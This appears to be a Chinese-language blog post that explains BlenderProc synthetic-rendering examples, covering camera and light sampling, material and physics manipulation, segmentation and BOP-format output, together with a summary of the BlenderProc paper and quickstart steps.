    • 在这里,深度图像没有反锯齿处理,意味着对于每个像素,该像素中的深度不会聚合在其表面上。虽然距离和深度图像听起来很相似,但它们并不相同:在距离图像中,每个像素都包含从摄像机位置到场景中对应点的实际距离。而在深度图像中,每个像素都包含相应点所处的与摄像机平行的平面与摄像机之间的距离。

    =>创建文件 normal_0000.exrnormal_0001.exrdistance_0000.exrdistance_0001.exr

    在本例中,所有这些文件都是临时文件,直接在渲染后读取并在临时文件夹中删除。然后将它们打包成字典并返回,保存在 data 变量中。

    FAQ:如果我们直接读取它们,为什么还要将它们存储在磁盘上?

    • Blender 没有其他选项,只能先将它们保存到磁盘,然后再读取它们。

    首先,通过调用 bproc.renderer.enable_normals_output() 和 bproc.renderer.enable_depth_output(activate_antialiasing=False) 函数,启用了法线和深度渲染。其中,enable_normals_output() 函数允许将法线渲染输出到渲染结果中,而 enable_depth_output(activate_antialiasing=False) 函数则允许将深度渲染输出到渲染结果中,并且关闭了抗锯齿选项。

    接着,调用 bproc.renderer.render() 函数,开始渲染整个渲染管线,并将渲染结果存储在 data 变量中。在渲染过程中,会依次执行多个处理步骤,包括场景图遍历、光照计算、材质映射、纹理映射等,并最终生成最终的渲染结果。渲染结束后,data 变量中将包含法线和深度信息,它们可以用来进行后续的图像处理、计算机视觉等任务。

    保存成 .hdf5 文件:

    1
    bproc.writer.write_hdf5(args.output_dir, data)

    Camera sampling

    Usage

    1
    blenderproc run examples/basics/camera_sampling/main.py examples/resources/scene.obj examples/basics/camera_sampling/output

    Visualization

    1
    blenderproc vis hdf5 examples/basics/camera_sampling/output/0.hdf5
    1
    Keys: 'colors': (512, 512, 3), 'depth': (512, 512), 'normals': (512, 512, 3)

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    # Find point of interest, all cam poses should look towards it
    # 通过调用 bproc.object.compute_poi(objs) 函数,计算出一组物体的几何中心点 poi,作为相机观察的焦点。
    poi = bproc.object.compute_poi(objs)
    # Sample five camera poses
    # 采样了五个随机的相机位置,渲染出 5 张图
    for i in range(5):
    # Sample random camera location above objects
    # 通过调用 np.random.uniform([-10, -10, 8], [10, 10, 12]) 函数,从一个三维坐标区间中随机取得一个相机位置,其中相机位置的 x、y 坐标范围为 [-10, 10],z 坐标范围为 [8, 12]。
    location = np.random.uniform([-10, -10, 8], [10, 10, 12])
    # Compute rotation based on vector going from location towards poi
    # 对于每一个相机位置,进一步计算其旋转矩阵 rotation_matrix,以便将相机的视线朝向 poi 的方向。
    # 具体而言,调用 bproc.camera.rotation_from_forward_vec(poi - location, inplane_rot=np.random.uniform(-0.7854, 0.7854)) 函数,以相机位置和 poi 之间的向量作为前向向量,并通过 inplane_rot 参数加入少量的水平旋转随机性(其值在 [-0.7854, 0.7854] 范围内)来计算出旋转矩阵 rotation_matrix。
    rotation_matrix = bproc.camera.rotation_from_forward_vec(poi - location, inplane_rot=np.random.uniform(-0.7854, 0.7854))
    # Add homog cam pose based on location an rotation
    # 将相机位置和旋转信息组合为齐次相机-世界变换矩阵
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation_matrix)
    # 将其添加到 BlenderProc 中,以便后续渲染时使用。这样,就实现了对场景从不同视角的渲染。
    bproc.camera.add_camera_pose(cam2world_matrix)

    Light sampling

    Usage

    1
    blenderproc run examples/basics/light_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/light_sampling/output

    Visualization

    1
    blenderproc vis hdf5 examples/basics/light_sampling/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # Define a light
    light = bproc.types.Light()
    light.set_type("POINT")
    # Sample its location in a shell around the point [1, 2, 3]
    light.set_location(bproc.sampler.shell(
    center=[1, 2, 3],
    radius_min=4,
    radius_max=7,
    elevation_min=15,
    elevation_max=70
    ))
    light.set_energy(500)

    这段代码的含义是:

    首先,创建了一个名为 light 的 BlenderProc Light 类型变量。

    接着,通过调用 light.set_type(“POINT”) 函数,指定该光源为点光源类型,即在三维空间中的某一点产生均匀辐射的光源。

    然后,通过调用 bproc.sampler.shell(center=[1, 2, 3], radius_min=4, radius_max=7, elevation_min=15, elevation_max=70) 函数,生成一个位于包围点 [1, 2, 3] 的球壳内的随机三维坐标位置,并将其设置为光源的位置,以实现光源位置的随机性。具体而言,函数的参数如下:

    • center=[1, 2, 3]:球心位置为 [1, 2, 3]。
    • radius_min=4:球壳内径的最小值为 4。
    • radius_max=7:球壳外径的最大值为 7。
    • elevation_min=15:光源位置相对于球心高度的最小值为 15 度。
    • elevation_max=70:光源位置相对于球心高度的最大值为 70 度。

    最后,通过调用 light.set_energy(500) 函数,将光源的强度 energy 设置为 500 瓦特,以控制光照亮度。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    # render the whole pipeline
    data = bproc.renderer.render()

    # Collect states of all objects
    object_states = []
    for obj in objs:
    object_states.append({
    "name": obj.get_name(),
    "local2world": obj.get_local2world_mat()
    })
    # Add states (they are the same for all frames here)
    data["object_states"] = [object_states] * bproc.utility.num_frames()

    # Collect state of the one light
    light_state = {
    "name": light.get_name(),
    "local2world": light.get_local2world_mat(),
    "energy": light.get_energy()
    }
    # Add states (its the same for all frames here)
    data["light_states"] = [light_state] * bproc.utility.num_frames()

    # Collect state of the camera at all frames
    cam_states = []
    for frame in range(bproc.utility.num_frames()):
    cam_states.append({
    "cam2world": bproc.camera.get_camera_pose(frame),
    "cam_K": bproc.camera.get_intrinsics_as_K_matrix()
    })
    # Adds states to the data dict
    data["cam_states"] = cam_states

    这段代码的含义是:

    首先,通过调用 bproc.renderer.render() 函数,对当前的场景进行渲染,并将渲染结果存储在 data 变量中。

    接着,通过遍历 objs 列表中的每一个对象 obj,将 obj 的名称和本地坐标系到世界坐标系的变换矩阵信息添加到 object_states 列表中。

    然后,将 object_states 列表复制 num_frames 次,并将其作为数据字典 data 中键名为 “object_states” 的值,表示所有帧的物体状态相同。

    接下来,将 light 对象的名称、本地坐标系到世界坐标系的变换矩阵信息和能量值信息添加到 light_state 字典中,并将其复制 num_frames 次并添加到 data 中键名为 “light_states” 的值中,表示所有帧的光源状态相同。

    最后,通过循环遍历所有帧的索引 frame,将每一帧相机的相机坐标系到世界坐标系的变换矩阵 cam2world 和相机的内参矩阵 K 添加到 cam_states 列表中,并将其作为数据字典 data 中键名为 “cam_states” 的值,表示所有帧的相机状态。

    Object selection and manipulation

    Usage

    1
    blenderproc run examples/basics/entity_manipulation/main.py examples/resources/scene.obj examples/basics/entity_manipulation/output

    Visualization

    1
    blenderproc vis hdf5 examples/basics/entity_manipulation/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    # load the objects into the scene
    objs = bproc.loader.load_obj(args.scene)

    # Find object with name Suzanne
    suzanne = bproc.filter.one_by_attr(objs, "name", "Suzanne")
    # Set its location and rotation
    suzanne.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))
    suzanne.set_rotation_euler([1, 1, 0])

    这个示例的重点是使用 BlenderProc 进行过滤操作以及设置对象的旋转和位置。

    在此过滤操作中,我们将条件设置为:"name": 'Suzanne',意思是我们想要选择所有满足 obj.name == 'Suzanne' 的对象。在这种情况下,只有一个对象符合要求。如果我们想要选择多个元素,我们可以使用 bproc.filter.by_attr() 函数。这样就可以选择多个对象。

    请注意:任何给定的字符串类型属性值都可以被视为正则表达式,只需在 one_by_attr fct. 调用中设置 regex=True 即可。因此,"name": 'Cylinder.*' 的条件将选择场景中的所有三个圆柱体。

    要查看所有可能的属性名称,请查阅官方 Blender 文档:https://docs.blender.org/api/current/bpy.types.Object.html。

    Material selection and manipulation

    Usage

    1
    blenderproc run examples/basics/material_manipulation/main.py examples/basics/material_manipulation/scene.obj images examples/basics/material_manipulation/output
    • examples/basics/material_manipulation/main.py: path to the python file.
    • examples/basics/material_manipulation/scene.obj: path to the object file with the basic scene.
    • images: path to a folder with .jpg textures to be used in the sampling process.
    • examples/basics/material_manipulation/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/basics/material_manipulation/output/0.hdf5

    png

    1
    2
    3
    4
    5
    6
    7
    # Find all materials
    materials = bproc.material.collect_all()

    # Find the material of the ground object
    ground_material = bproc.filter.one_by_attr(materials, "name", "Material.001")
    # Set its displacement based on its base color texture
    ground_material.set_displacement_from_principled_shader_value("Base Color", multiply_factor=1.5)

    这段代码的作用是:

    1. 使用 bproc.material.collect_all()函数查找所有材质。
    2. 使用 bproc.filter.one_by_attr()函数通过属性查找特定材质。在这种情况下,我们使用 “name”: “Material.001” 来查找 ground object 的材质。
    3. 使用 ground_material.set_displacement_from_principled_shader_value()函数来设置基于其基础颜色纹理的位移。在这种情况下,我们将 multiply_factor 设置为 1.5,以增加位移强度。

    这段代码的目的是修改指定材质的属性,实现更具创意的渲染效果。

    1
    2
    3
    4
    5
    6
    7
    # Collect all jpg images in the specified directory
    images = list(Path(args.image_dir).absolute().rglob("material_manipulation_sample_texture*.jpg"))
    for mat in materials:
    # Load one random image
    image = bpy.data.images.load(filepath=str(random.choice(images)))
    # Set it as base color of the current material
    mat.set_principled_shader_value("Base Color", image)

    这段代码的作用是:

    1. 使用 pathlib 库中的 Path() 函数来设置指定目录(args.image_dir)的绝对路径,并通过 rglob() 函数找到该目录下所有以 “material_manipulation_sample_texture*.jpg” 结尾的文件。

    png

    1. 遍历所有材质,为每个材质设置随机选择的纹理。在这里,我们使用了 random.choice() 函数从上一步中收集到的所有图像中随机选择一个。然后通过 mat.set_principled_shader_value() 函数将其设置为当前材质的基础颜色。

    这段代码的目的是为指定的 Blender 场景中的所有材质添加多样化的纹理素材,以增强渲染效果和真实感。

    Physics positioning

    Usage

    1
    blenderproc run examples/basics/physics_positioning/main.py examples/basics/physics_positioning/active.obj examples/basics/physics_positioning/passive.obj examples/basics/physics_positioning/output
    • examples/basics/physics_positioning/main.py: path to the python file.
    • examples/basics/physics_positioning/active.obj: path to the object file with active objects, i. e. objects which we want to participate in physics simulation.
    • examples/basics/physics_positioning/passive.obj: path to the object file with passive objects, i. e. objects which we do not want to participate in physics simulation, e.g. plane.
    • examples/basics/physics_positioning/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/basics/physics_positioning/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # Define a function that samples the pose of a given sphere
    def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, 8], [5, 5, 12]))
    obj.set_rotation_euler(bproc.sampler.uniformSO3())

    # Sample the poses of all spheres above the ground without any collisions in-between
    bproc.object.sample_poses(
    spheres,
    sample_pose_func=sample_pose
    )

    首先,我们定义一个函数,将给定的物体设置为新的姿态。然后,在 bproc.object.sample_poses 函数调用中使用该函数,在每个物体上调用它,然后检查是否与其他物体发生碰撞。这个过程会重复进行,直到所有物体都被放置且没有发生碰撞。

    这段代码的作用是:

    1. 定义一个名为 sample_pose() 的函数,该函数接受一个 bproc.types.MeshObject 对象作为参数,并对其进行位置和旋转属性的随机抽样,以模拟物体在 3D 空间中的运动姿态。具体来说,我们使用 obj.set_location() 函数将物体的位置坐标随机设置在 [-5,-5,8] 到 [5,5,12] 的范围内,并使用 obj.set_rotation_euler() 函数将物体的欧拉旋转角度随机设置。
    2. 使用 bproc.object.sample_poses() 函数对所有位于地面上方的 sphere 进行姿态抽样,同时确保每个 sphere 之间没有碰撞发生。我们通过传递 spheres 和 sample_pose_func 参数来执行这一操作。其中,spheres 指代待采样的所有 sphere 对象的列表,sample_pose_func 参数指定了姿态抽样函数,即上述定义的 sample_pose() 函数。

    这段代码的目的是模拟物体的动态运动过程,以增加渲染效果的真实感。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # Make all spheres actively participate in the simulation
    # 通过循环遍历所有的球体对象 spheres,调用 obj.enable_rigidbody(active=True) 函数使其能够参与物理仿真。其中 active=True 代表该球体是主动物体,需要施加力和碰撞等物理效应。
    for obj in spheres:
    obj.enable_rigidbody(active=True)
    # The ground should only act as an obstacle and is therefore marked passive.
    # To let the spheres fall into the valleys of the ground, make the collision shape MESH instead of CONVEX_HULL.
    # 将地面对象 ground 的 enable_rigidbody 函数的 active 设置为 False,表示它是被动物体,只参与碰撞等物理效应,并调整地面的碰撞形状为 MESH,以便让球体可以掉落到地面的洼地中。
    ground.enable_rigidbody(active=False, collision_shape="MESH")

    # Run the simulation and fix the poses of the spheres at the end
    # 调用 bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1) 函数来运行物理仿真并在结束时固定球体的位置。具体而言,min_simulation_time 和 max_simulation_time 分别指示物理仿真的最小和最大时间(秒),check_object_interval 则指示固定物体位置时检查位置的时间间隔(秒)。在本例中,物理仿真时间介于 4s 和 20s 之间,每秒钟检查一次物体位置并固定。(注意:如果没有启用物理,该函数将不起作用。)
    bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1)

    这段代码的作用是:

    1. 将所有 sphere 对象设置为活动态,通过启用其刚体属性(rigidbody)实现。对于地面来说,将 active 属性设置为 False,这意味着它在场景中是被动的,但可以和其他活动态物体发生交互。此外,我们还使用 MESH 碰撞形状(collision shape)而不是默认的 CONVEX_HULL 碰撞形状来设置 ground 物体的碰撞形状。需要注意的是,在更复杂的用例中使用 mesh 碰撞形状可能会导致性能问题和错误。如果出现这些情况,最好尝试使用 physics_convex_decomposition。
    2. 在运行物理仿真时,函数每隔 1 秒检查一次是否仍有对象在运动。如果没有,就停止仿真。然而,仿真至少运行 4 秒,最多运行 20 秒。
    3. 在仿真结束时,将所有 sphere 的位置重新固定。这样,我们可以轻松采样位于凹凸不平的平面上方的 sphere 的随机位置。

    这段代码的目的是模拟物体之间的物理交互和运动过程,以增加渲染效果的真实感。

    Semantic Segmentation

    Usage

    1
    blenderproc run examples/basics/semantic_segmentation/main.py examples/resources/camera_positions examples/basics/semantic_segmentation/scene.blend examples/basics/semantic_segmentation/output
    • examples/basics/semantic_segmentation/main.py: path to the python file.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/basics/semantic_segmentation/scene.blend: path to the blend file with the basic scene.
    • examples/basics/semantic_segmentation/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/basics/semantic_segmentation/output\1.hdf5

    png

    Code

    1
    2
    # load the objects into the scene
    objs = bproc.loader.load_blend(args.scene)

    这个代码段加载了 .blend 文件,从文件中仅提取网格对象,而不是提取该 .blend 文件中存储的所有信息。

    需要注意的是,在加载的 .blend 文件中,所有对象都已经设置了属性名称为“category_id”的自定义属性。这可以通过手动执行以下步骤来完成:

    1
    obj.set_cp("category_id", 0)
    1
    2
    # enable segmentation masks (per class and per instance)
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

    这个模块可以将任何类型的对象相关信息映射到图像或场景中对象的索引列表。例如,如果你想要将自定义属性 category_id 映射到图像上,可以设置 map_by=["category_id"]。然后,每个像素都会被分配一个现有像素中的对象的自定义属性 category_id。如果它被设置为实例化,每个像素将获得一个场景中对象的 id,这些 id 对于多帧是一致的,这也意味着并不是每个图像中都必须出现所有的 id。

    此外,还可以将其设置为对象类的不同自定义属性或属性,如“name”,这将返回每个对象的名称。这无法保存在图像中,因此需要生成一个额外的字典,附加到最终的 .hdf5 容器中。其中,它将每个实例编号映射到一个名称。如果有不能存储在图像中的键,则必须生成一个实例图像,否则会引发错误消息。

    例如,也可以使用属性:“location”。这将访问每个对象的位置并将其添加到字典中。需要注意的是,如果背景可见,则会引发错误,因为背景没有位置属性。这可以通过提供默认值来避免,例如:default_values={"location: [0,0,0]}

    Camera Object Pose Setting

    Usage

    1
    blenderproc run examples/basics/camera_object_pose/main.py examples/basics/camera_object_pose/obj_000004.ply examples/basics/camera_object_pose/output
    • examples/basics/camera_object_pose/main.py: Python 文件的路径。

    随后的参数用于填充配置文件中的占位符,例如 <args:0>

    • examples/basics/camera_object_pose/obj_000004.ply: 模型文件的路径,在这里是 hb 数据集中的一个基本对象。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    ply
    format ascii 1.0
    element vertex 59070
    property float x
    property float y
    property float z
    property float nx
    property float ny
    property float nz
    property uchar red
    property uchar green
    property uchar blue
    property uchar alpha
    element face 118136
    property list uchar int vertex_indices
    end_header
    -74.8915252685546875 -19.9308242797851562 -39.8891220092773438 -0.881483376026153564 0.153793498873710632 -0.446469098329544067 201 194 89 255
    -74.283599853515625 -19.7608661651611328 -40.8353233337402344 -0.821542501449584961 0.139040097594261169 -0.552933812141418457 203 203 102 255
    -74.7142333984375 -19.3212966918945312 -39.9898719787597656 -0.876855313777923584 0.193883597850799561 -0.43992498517036438 201 196 92 255

    ...

    3 276 277 275
    3 279 278 249
    3 279 249 252

    ...

    这个 ply 文件包含了一个三角网格模型的数据,其中每行数据表示一个顶点或者一个三角面的信息。下面是文件中的每个部分的解释:

    第一行指定了文件使用的 PLY 文件格式。

    第二行指定了文件的数据格式为 ASCII 格式,版本为 1.0。

    第三行声明该模型包含 59070 个顶点。

    第四行到第十行分别声明了顶点数据中包含的属性,分别是 x,y,z 坐标和法线 nx,ny,nz 以及颜色属性 red,green,blue,alpha。

    第十一行声明该模型包含 118136 个三角形(即面)。

    第十二行定义了面数据的属性列表,包括每个面由几个顶点组成以及对应的顶点索引。

    第十三行是文件头与数据部分的分隔符。

    从第十四行开始每一行都表示一个顶点的信息,按照 x,y,z 坐标、法线 nx,ny,nz 和颜色属性 red,green,blue,alpha 依次排列。

    从最后一个顶点的信息结束后,文件中间间隔了若干空行,接下来每一行表示一个三角形面,格式为"3 a b c",表示该面由三个顶点 a,b,c 组成,a,b,c 分别是该点在顶点列表中的索引。

    总的来说,这个 PLY 文件描述了一个三角网格模型,包含了所需的顶点和面数据,可以被一些三维建模软件或者游戏引擎读取和展示。

    • examples/basics/camera_object_pose/output: 输出目录的路径。

    png

    BOP 数据集形式的输出

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    # Use vertex color for texturing
    for mat in obj.get_materials():
    mat.map_vertex_color()
    # Set pose of object via local-to-world transformation matrix
    obj.set_local2world_mat(
    [[0.331458, -0.9415833, 0.05963787, -0.04474526765165741],
    [-0.6064861, -0.2610635, -0.7510136, 0.08970402424862098],
    [0.7227108, 0.2127592, -0.6575879, 0.6823395750305427],
    [0, 0, 0, 1.0]]
    )
    # Scale 3D model from mm to m
    obj.set_scale([0.001, 0.001, 0.001])
    # Set category id which will be used in the BopWriter
    obj.set_cp("category_id", 1)
    • 将所有材质转换为顶点颜色(vertex color)材质,并直接使用每个加载的 .ply 对象的顶点颜色。这意味着,我们不再使用原始材质文件,而是用顶点颜色来渲染场景。
    • 设置物体姿态的 matrix_world 属性为米(meter)单位。
    • 按照每个维度的尺寸比例,将模型从毫米(mm)单位缩放到米(meter)单位。需要注意的是,如果模型已经以米(meter)为单位,则不需要执行这一步操作。
    • 设置一个新的自定义属性 "category_id",并将其设置为 1。后面的分割渲染器将使用该属性。

    这段代码的目的是对加载的模型进行预处理和优化,以便更好地适应后续渲染流程的需要。其中,将材质转换为顶点颜色材质可以减少纹理贴图的计算量,使场景更易于渲染;缩放模型到标准的米(meter)单位可以方便控制场景尺寸及物体之间距离的关系;设置自定义属性可以增加场景元素的分类信息,让后续的分割渲染器能够更好地区分不同的物体。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # Set intrinsics via K matrix
    # 通过相机矩阵 K 设置相机内参(intrinsics)。
    # K 矩阵包括相机的焦距、主点和畸变参数等,用于描述相机的内部光学特性。函数将 K 矩阵作为参数,同时指定了最终图像的宽度和高度。
    bproc.camera.set_intrinsics_from_K_matrix(
    [[537.4799, 0.0, 318.8965],
    [0.0, 536.1447, 238.3781],
    [0.0, 0.0, 1.0]], 640, 480
    )
    # Set camera pose via cam-to-world transformation matrix
    # 通过摄像机到世界坐标系的变换矩阵设置相机姿态(pose)。其中,变换矩阵 cam2world 描述了相机坐标系相对于世界坐标系的变换关系。该变换矩阵通常由外部传感器提供,如惯性测量单元(IMU)、GPS 等。
    cam2world = np.array([
    [1, 0, 0, 0],
    [0, 1, 0, 0],
    [0, 0, 1, 0],
    [0, 0, 0, 1]
    ])
    # Change coordinate frame of transformation matrix from OpenCV to Blender coordinates
    # 由于使用的是 OpenCV 坐标系,所以需要将坐标系转换为 Blender 中的坐标系。
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])
    bproc.camera.add_camera_pose(cam2world)

    这段代码的目的是对相机的内部光学特性和相对位置进行设置。通过设置相机内参和姿态,可以精确地模拟相机在场景中的位置、朝向,以及捕捉图像时的畸变效果等。这有助于实现更逼真的渲染效果,并提高视觉算法的精度。

    • 通过调用 set_intriniscs_from_K_matrix 来设置相机的 K 矩阵。
    • 相机的位姿由其世界矩阵定义,在这种情况下,它只是单位矩阵。
    • 将相机源帧更改为匹配 Blender 帧(这将从 OpenCV 坐标系转换为 Blender 的坐标系)。
    • 最后,将这个新的相机矩阵添加到位姿中,即可渲染。
    1
    2
    3
    4
    5
    # render the whole pipeline
    data = bproc.renderer.render()

    # Write object poses, color and depth in bop format
    bproc.writer.write_bop(args.output_dir, [obj], data["depth"], data["colors"], m2mm=True, append_to_existing_output=True)

    BOP 数据集是一个公共的工业场景物体姿态估计数据集,包含了 80 个具有挑战性的工业部件,每个部件都有不同的材质、变形、表面纹理和反光性质。BOP 数据集中每个部件都拍摄了数百张带有真实噪声深度信息和 RGB 图像的灰度图。此外,BOP 数据集还提供了每个部件的正式模型,即 CAD 文件,以便将您的方法与 CAD 进行比较。BOP 的主要目的是为评估工业场景物体姿态估计算法提供标准化基准。

    • 保存 BOP 数据集中提供的所有姿态和相机信息。
    • "m2mm" 将姿态转换为毫米,与原始的 BOP 标注一致。如果想要使用米作为单位则设置为 False。
    • "append_to_existing_output" 表示如果选择了相同的输出文件夹,则数据将被追加而不是覆盖。
    ]]>
    @@ -6319,7 +6319,7 @@ /posts/Paper-BlenderProc/ - 资源

    论文

    ​ 在过去几年中,对可用于训练的高质量图像的需求急剧上升。在姿态估计和实例分割中,人工标注数据的工作量巨大。为了避免这种情况,我们提出了 BlenderProc。


    Config

    ​ 作为一般配置,我们使用 YAML 文件。每个配置文件包含三个部分:

    1. 第一部分是 Setup
    "setup": {
    "blender_install_path": "/PATH",
    "blender_version": "blender-2.80",
    "pip": [
    "h5py",
    "imageio"
    ]
    }
    1. 名为 global 的第二部分描述了设置:
    "global": {
    "all": {
    "output_dir": "<args:0>"
    }
    }
    1. 第三部分是 modules,配置中的顺序了执行顺序。每个模块都有一个名称,该名称对应于模块文件夹的名称和类名,管道将动态加载相应的类。这个类必须从我们的模块基类派生,并将执行其中的代码,这里的相应设置将传递给它。
    "modules": [
    {
    "name": "main.Initializer"
    },
    {
    "name": "loader.ObjLoader",
    "config": {"path": "<args:1 >"}
    }
    ]

    LOADER

    加载器模块将各种 3D 网格加载到场景中,此外还将所有其他对象(如灯和相机)加载到场景。

    RENDERER

    渲染器有几个选项:

    • resolution_x, resolution_y:待渲染图像的分辨率

    • samples:渲染场景的采样数量,越多的采样可以减少噪声

    • render_depth:渲染当前图像的深度

    • stero:启动立体声图像的渲染

    Color renderer

    png

    • min_bozes,max_bozes:限制每条光线可以进行的反弹次数;越高,结果的质量越好,但渲染速度越低

    • glossy_bounces:光泽反射反弹的最大数量必须大于零,这样才能看到光泽效果

    Depth renderer

    png

    ​ 该渲染器基于 blender 的内部深度估计生成深度图像。

    Normal renderer

    png

    ​ 许多深度学习任务通过引入法线作为训练问题的输入而大大改进。其中一个问题是例如深度估计。法线被规格化并显示为 XYZ 值。

    Segmentation renderer

    png

    ​ 为了进行分割,每个对象都需要一个类别 id,在 suncg 加载程序中,它们已经被正确设置。对于您自己的加载器,您必须手动执行此操作,方法是将属性 category_id 添加到所有对象中。此属性包含数据集中类的编号。

    ​ 可以创建实例分割掩码,其中不仅保存索引,还保存一个字典,该字典将索引映射到类和实例号。这两个文件都存储在 .hdf5 文件中,这使得使用更加容易。

    ​ 要在语义分割和实例分割之间切换,可以使用以下设置:

    • map_by:如果设置为 class,则完成基于 category_id 的语义分割。如果设置为 instance,则执行实例分割。

    SAMPLER

    ​ BlenderProc 包含多个采样器,通常用于灯光、相机和对象。

    ​ 以下是在生成光源或相机位置时如何轻松使用采样器的两个示例。

    "location": {
    "name": "Uniform3dSampler",
    "parameters": {
    "min": [0, 0, 0],
    "max": [1, 1, 1]
    }
    }

    ​ 此外,每个采样器都可以进行接近度检查。

    "location": {
    "name": "SphereSampler",
    "parameters": {
    "center": [0, 0, 1],
    "radius": 4,
    "mode": "SURFACE"
    }
    }

    ​ 可以对相机进行采样,然后检查该位置是否距离任何对象至少一米,以及场景中对象的平均距离是否在一定范围内。这些选项可以在逻辑上任意组合,这使得创造完美的条件变得容易。在这个例子中,要求相机距离其视野中的任何物体至少一个单位,并且其值上的平均距离在 1 到 4 个单位之间。只有这样才能使用姿势。

    "proximity_checks": {
    "min": 1.0,
    "avg": {
    "min": 1.0,
    "max": 4.0
    }
    }

    GENERATION TIME

    ​ 生成是以批处理的方式离线完成的,如果相机姿势已经采样,那么每个场景只调用特定的渲染器,最后每个相机姿势的所有文件都会合并到 .hdf5 文件中。对于 suncg 文件,我们可以在一个 gpu 上每小时生成大约 3.000 张图像。然而,这些场景相当复杂,在大多数情况下,渲染速度甚至应该比这更快。尽管如此,速度对我们来说并不是什么大问题,因为我们认为生成通常不是一个重复的过程。因此,花一个周末在上面,然后拥有 18 万张图像通常就足够完成大多数训练任务了。

    代码

    Hello World

    ​ 安装环境:

    conda create -n blender python=3.10
    conda activate blender
    pip install Blenderproc

    ​ 在 Pycharm 下使用该环境,创建一个 quickstart.py

    这段代码使用 BlenderProc 包创建了一个简单的场景:在场景中创建了一个猴子模型并添加了一个点光源,然后将相机设置在该模型前方,最后渲染场景并将结果写入 HDF5 文件。下面是这段代码的详细解释:

    首先,通过导入 blenderproc 和 numpy 模块来初始化 BlenderProc。bproc.init() 函数用于初始化 BlenderProc 的渲染器和其他必要组件。

    然后,使用 bproc.object.create_primitive() 函数创建了一个名为 “MONKEY” 的简单对象(即猴子模型)并存储在变量 obj 中。

    接着,使用 bproc.types.Light() 函数创建了一个名为 light 的点光源对象,并将其位置设置为 [2, -2, 0],能量设置为 300。这样一来,场景中的猴子模型将被点光源照亮。

    接下来,使用 bproc.math.build_transformation_mat() 函数创建了一个相机姿态矩阵 cam_pose,并设置相机的位置为 [0, -5, 0],朝向为 [np.pi / 2, 0, 0]。也就是说,相机被放置在场景中猴子的正上方,并指向猴子的正面。

    接着,使用 bproc.camera.add_camera_pose() 函数将相机的位置和朝向应用到场景中。现在的场景已准备好进行渲染。

    使用 bproc.renderer.render() 函数来渲染场景,并将结果返回给变量 data。

    最后,使用 bproc.writer.write_hdf5() 函数将渲染结果写入文件。该函数的第一个参数是保存文件的路径和名称(不包括扩展名),第二个参数是要写入文件的数据。在这里,我们将渲染结果写入了名为 “output.hdf5” 的 HDF5 文件中。

    import blenderproc as bproc
    import numpy as np

    bproc.init()

    # Create a simple object:
    obj = bproc.object.create_primitive("MONKEY")

    # Create a point light next to it
    light = bproc.types.Light()
    light.set_location([2, -2, 0])
    light.set_energy(300)

    # Set the camera to be in front of the object
    cam_pose = bproc.math.build_transformation_mat([0, -5, 0], [np.pi / 2, 0, 0])
    bproc.camera.add_camera_pose(cam_pose)

    # Render the scene
    data = bproc.renderer.render()

    # Write the rendering into a hdf5 file
    bproc.writer.write_hdf5("output/", data)

    ​ 在 shell 中输入:

    blenderproc run quickstart.py

    ​ 即可开跑(第一次跑会装一堆库)。

    Selecting render devices...
    Device NVIDIA GeForce RTX 4060 Laptop GPU of type OPTIX found and used.
    Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
    Fra:0 Mem:8.80M (Peak 8.87M) | Time:00:00.74 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne
    Fra:0 Mem:8.85M (Peak 8.87M) | Time:00:00.74 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Initializing

    ...

    Fra:0 Mem:28.56M (Peak 48.98M) | Time:02:02.85 | Remaining:00:00.01 | Mem:0.33M, Peak:15.33M | Scene, ViewLayer | Sample 1008/1024
    Fra:0 Mem:38.57M (Peak 52.57M) | Time:02:02.86 | Mem:0.33M, Peak:15.33M | Scene, ViewLayer | Sample 1024/1024
    Saved: 'C:\XXX\rgb_0000.png'
    Time: 02:03.50 (Saving: 00:00.32)

    Merging data for frame 0 into output/0.hdf5

    Blender quit
    Cleaning temporary directory

    ​ 运行完后,生成文件 output\0.hdf5

    jpg

    ​ 在 shell 中输入:

    blenderproc vis hdf5 output/0.hdf5

    ​ 即可查看可视化结果:

    jpg

    ​ 在 shell 中输入:

    blenderproc debug quickstart.py

    ​ 即可打开 Blender 的 GUI 界面:

    jpg

    ​ 点击 Run BlenderProc 即可开跑!

    jpg

    Tutorials

    Loading and manipulating objects

    下载

    ​ 如果还没有任何数据,BlenderProc 通过 CLI 为许多数据集和免费提供的资产提供下载功能:blenderproc

    • blenderproc download blenderkit <output_dir>:从搅拌机套件下载材料和模型
    • blenderproc download cc_textures <output_dir>:从 cc0textures.com 下载纹理。
